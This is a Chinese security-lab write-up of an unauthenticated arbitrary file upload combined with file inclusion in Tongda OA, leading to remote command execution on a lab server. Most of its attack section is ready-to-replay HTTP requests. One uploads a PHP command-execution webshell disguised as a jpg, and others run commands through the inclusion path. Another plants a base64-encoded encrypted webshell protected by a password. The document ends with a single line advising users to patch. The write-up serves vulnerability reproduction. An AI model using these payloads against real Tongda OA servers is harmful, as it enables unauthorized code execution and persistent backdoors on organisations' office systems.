点击蓝字|关注我们

通达OA前台任意文件上传漏洞

+文件包含漏洞导致getshell

一、漏洞介绍/Profile/

通达OA介绍:

通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,北京通达信科科技有限公司是一支以协同管理软件研发与实施、服务与咨询为主营业务的高科技团队,是国内协同管理软件行业里唯一一家央企单位,中国协同管理软件的领军企业。

通达OA为各行业不同规模的众多用户提供信息化管理能力,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,帮助广大用户降低沟通和管理成本,提升生产和决策效率。该系统采用领先的B/S(浏览器/服务器)操作方式,使得网络办公不受地域限。通达Office Anywhere采用基于WEB的企业计算,主HTTP服务器采用了世界上最先进的Apache服务器,性能稳定可靠。数据存取集中控制,避免了数据泄漏的可能。提供数据备份工具,保护系统数据安全。多级的权限控制,完善的密码验证与登录验证机制更加强了系统安全性。

漏洞影响的版本有:

V11版、2017版、2016版、2015版、2013增强版、2013版。

备注:

无需登录,前台即可实现漏洞利用

2013版:

文件上传漏洞路径:/ispirit/im/upload.php

文件包含漏洞路径:/ispirit/interface/gateway.php

2017版:

文件上传漏洞路径:/ispirit/im/upload.php

文件包含漏洞路径:/mac/gateway.php

漏洞环境:

靶机(Windows server 2008 R2)IP:172.16.0.45

通达OA:V 11.3版本

二、环境搭建/Environment/

(1)下载通达OA V11.3版本以后,点击运行TDOA11.3的应用程序运行文件

(2)确保80端口不被占用的情况下,将应用搭建在80端口,然后点击下一步

(3)配置完成

(4)查看搭建的结果

(5)账户为admin,密码为空,登陆到后端系统

三、漏洞复现/Reconstruct/

3.1 任意命令执行漏洞

(1)前台任意文件上传漏洞:无需登录,抓取任意数据包,修改数据包进行重放,上传后缀为jpg的木马文件

POST /ispirit/im/upload.php HTTP/1.1Host: 172.16.0.45Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGBAccept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5Cookie: PHPSESSID=123Connection: closeContent-Length: 660------WebKitFormBoundarypyfBh1YB4pV8McGBContent-Disposition: form-data; name="UPLOAD_MODE"2------WebKitFormBoundarypyfBh1YB4pV8McGBContent-Disposition: form-data; name="P"123------WebKitFormBoundarypyfBh1YB4pV8McGBContent-Disposition: form-data; name="DEST_UID"1------WebKitFormBoundarypyfBh1YB4pV8McGBContent-Disposition: form-data; name="ATTACHMENT"; filename="jpg"Content-Type: image/jpeg<?php $command=$_POST['cmd'];$wsh = new COM('WScript.shell');$exec = $wsh->exec("cmd /c ".$command);$stdout = $exec->StdOut();$stroutput = $stdout->ReadAll();echo $stroutput;?>------WebKitFormBoundarypyfBh1YB4pV8McGB--

(2)查看运行结果

(3)前台文件包含漏洞:修改数据包,包含前面上传的jpg木马文件,即可实现执行任意命令

此处执行命令“net user”

POST /ispirit/interface/gateway.php HTTP/1.1Host: 172.16.0.45Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 71json={"url":"/general/../../attach/im/2012/820434636.jpg"}&cmd=net user

(4)前台文件包含漏洞:修改数据包,包含前面上传的jpg木马文件,即可实现执行任意命令

此处执行命令“ipconfig”

POST /ispirit/interface/gateway.php HTTP/1.1Host: 172.16.0.45Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 73json={"url":"/general/../../attach/im/2012/820434636.jpg"}&cmd=ipconfig

3.2 getshell

(1)前台任意文件上传漏洞:抓取任意数据包,修改数据包进行重放,上传后缀为jpg的木马文件(木马文件执行写入文件操作)

POST /ispirit/im/upload.php HTTP/1.1Host: 172.16.0.45Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGBAccept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5Cookie: PHPSESSID=123Connection: closeContent-Length: 1393------WebKitFormBoundarypyfBh1YB4pV8McGBContent-Disposition: form-data; name="UPLOAD_MODE"2------WebKitFormBoundarypyfBh1YB4pV8McGBContent-Disposition: form-data; name="P"123------WebKitFormBoundarypyfBh1YB4pV8McGBContent-Disposition: form-data; name="DEST_UID"1------WebKitFormBoundarypyfBh1YB4pV8McGBContent-Disposition: form-data; name="ATTACHMENT"; filename="jpg"Content-Type: image/jpeg<?php $fp = fopen('shell.php', 'w');$a = base64_decode("PD9waHAKQGVycm9yX3JlcG9ydGluZygwKTsKc2Vzc2lvbl9zdGFydCgpOwppZiAoaXNzZXQoJF9HRVRbJ3Bhc3MnXSkpCnsKICAgICRrZXk9c3Vic3RyKG1kNSh1bmlxaWQocmFuZCgpKSksMTYpOwogICAgJF9TRVNTSU9OWydrJ109JGtleTsKICAgIHByaW50ICRrZXk7Cn0KZWxzZQp7CiAgICAka2V5PSRfU0VTU0lPTlsnayddOwoJJHBvc3Q9ZmlsZV9nZXRfY29udGVudHMoInBocDovL2lucHV0Iik7CglpZighZXh0ZW5zaW9uX2xvYWRlZCgnb3BlbnNzbCcpKQoJewoJCSR0PSJiYXNlNjRfIi4iZGVjb2RlIjsKCQkkcG9zdD0kdCgkcG9zdC4iIik7CgkJCgkJZm9yKCRpPTA7JGk8c3RybGVuKCRwb3N0KTskaSsrKSB7CiAgICAJCQkgJHBvc3RbJGldID0gJHBvc3RbJGldXiRrZXlbJGkrMSYxNV07IAogICAgCQkJfQoJfQoJZWxzZQoJewoJCSRwb3N0PW9wZW5zc2xfZGVjcnlwdCgkcG9zdCwgIkFFUzEyOCIsICRrZXkpOwoJfQogICAgJGFycj1leHBsb2RlKCd8JywkcG9zdCk7CiAgICAkZnVuYz0kYXJyWzBdOwogICAgJHBhcmFtcz0kYXJyWzFdOwoJY2xhc3MgQ3twdWJsaWMgZnVuY3Rpb24gX19jb25zdHJ1Y3QoJHApIHtldmFsKCRwLiIiKTt9fQoJQG5ldyBDKCRwYXJhbXMpOwp9Cj8+");fwrite($fp, $a);fclose($fp);?>------WebKitFormBoundarypyfBh1YB4pV8McGB--

(2)查看运行结果

(3)查看/webroot/ispirit/interface/目录下的文件信息

(4)前台文件包含漏洞:修改数据包,包含前面上传的jpg木马文件,会在文件包含的根目录下生成一个 shell.php 文件

POST /ispirit/interface/gateway.php HTTP/1.1Host: 172.16.0.45Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 73json={"url":"/general/../../attach/im/2012/213131861.jpg"}&cmd=ipconfig

(5)查看文件包含漏洞的执行结果

(6)使用冰蝎进行连接:http://172.16.0.45/ispirit/interface/shell.php

密码为:pass

PS:此处用蚁剑和菜刀无法进行连接

四、加固建议 /Suggestion/

建议使用受影响版本的通达OA用户登录通达OA官网,获取最新补丁。请根据当前OA版本选择所对应的程序文件,运行前请先做好备份。

本文作者:R

编辑排版:T

扫码关注我们

知乎|龙渊实验室

新浪微博|龙渊实验室

FreeBuf|龙渊实验室LongYuanLab

文件上传漏洞_通达OA前台任意文件上传漏洞+文件包含漏洞导致getshell相关推荐

  1. 通达OA 前台任意用户登录漏洞getshell

    前言    本次文章可以分为两部分,第一部分通达OA前台管理员伪造登录,第二部分后台附件getshell.作为一个笔记吧. 漏洞复现 管理员伪造登录 找到后台登录地址抓包修改url 删除cookie目 ...

  2. 通达OA前台任意用户登录漏洞+RCE漏洞复现

    声明 本文仅用于技术交流,请勿用于非法用途 由于传播.利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任. 文章作者拥有对此文章的修改和解释权.如 ...

  3. 通达OA前台任意用户伪造登录漏洞复现

    0x01简介 北京通达信科科技有限公司是一支以管理软件研发.实施.服务与咨询为主营业务的高科技企业,隶属于世界500强企业中国兵器工业集团公司. 2019最值得购买的OA系统排名 通达OA采用基于WE ...

  4. 自检代码中trustmanager漏洞_通达OA远程代码执行漏洞通告

    报告编号:B6-2020-031801

  5. jmeter file upload 变量_通达OA上传漏洞之变量覆盖分析

    作者:kw0ng 开始 通达OA上传到包含漏洞分析的文章已经有很多,本文重点分析,文件上传处决定路径信息是否回显的UPLOAD_MODE参数是怎么传递的. 代码分析 触发文件上传点位于/ispirit ...

  6. html 怎么让tr的css覆盖td的_通达OA上传漏洞之变量覆盖分析

    作者:kw0ng 开始 通达OA上传到包含漏洞分析的文章已经有很多,本文重点分析,文件上传处决定路径信息是否回显的UPLOAD_MODE参数是怎么传递的. 代码分析 触发文件上传点位于/ispirit ...

  7. php forms 上传更新json_通达OA任意文件上传漏洞详细分析

    影响 影响范围(但是只有V11版和2017版有包含文件的php,其余版本能上传文件.): V11版 2017版 2016版 2015版 2013增强版 2013版. 这个漏洞是几个月前的漏洞,主要是学 ...

  8. 通达oa php漏洞,通达OA系统傻逼上传漏洞分析,可以直接getshell附EXP

    通达oa是一个不错的OA系统,但是这个不错的OA系统,却有一个傻逼上传漏洞,再加上apache的那个奇葩解析漏洞,我靠,简直天作之合啊.下面做一个分析,可以直接getshell附EXP 漏洞的具体版本 ...

  9. 通达oa精灵的下载步骤_通达OA高危漏洞可能感染勒索病毒的风险提示

    1. 漏洞公告 近日,安恒应急响应中心监测到中国用户群最大的OA软件品牌--通达OA在官方论坛发布了紧急通知,提供了针对部分用户反馈遭到勒索病毒攻击的安全加固程序,补丁更新包括2013版.2013增强 ...

最新文章

  1. 基于PYQT编写一个人脸识别软件
  2. 站立会议-2014-04-14
  3. 【机器学习】 - 激活函数与交叉熵Sigmoid, Softmax, binary_crossentropy, categorican_crossentropy区别
  4. 解析一个C语言俄罗斯方块游戏,包你看了就会
  5. react 遍历对象_React 源码系列 | React Children 详解
  6. 视觉SLAM笔记(49) 后端状态估计
  7. 5 thinkpad 黑将评测_ThinkPad L380视频评测:全能型商务助手
  8. mysql之使用json
  9. c++ 中类重复定义的分析与解决办法
  10. 求斐波那契数列的三种方法
  11. [论文总结] 深度学习在农业领域应用论文笔记3
  12. 菜狗杯Misc迅疾响应wp
  13. 数据库中Count是什么意思和SUM有什么区别?
  14. 标准成本还是实际成本 成本核算标准选择
  15. mysql报错:1406, Data too long for column
  16. Python0019 音频处理(二).wav文件
  17. python 椭圆曲线_椭圆曲线double和add在python中的实现
  18. Vijos - 佳佳的魔法药水(最短路)
  19. Linux也可以这样美——Ubuntu18.04安装、配置、美化
  20. 【HTTP Live Streaming】(二)HLS 架构 部署 - 梳理

热门文章

  1. kubernetes1.16 错误排查
  2. Unity3D——Transform的Position和LocalPosition
  3. COSMIC的后端学习之路——1.3 海量数据去重的Hash与BloomFilter(布隆过滤器),bitmap(位图)
  4. HTML 编辑器的介绍及推荐
  5. 关于微信名称特殊字符存数据库出问题; Incorrect string value: ‘\xF0\x9F\x90\xAF’ for column ‘nickName’ at row 1
  6. (附源码)SSM新闻类网站JAVA计算机毕业设计项目
  7. Favicon 生成网站推荐
  8. spring boot elastic job 整合-定时任务
  9. 三星打印机Linux驱动安装
  10. Android原生 通过图片检测到人脸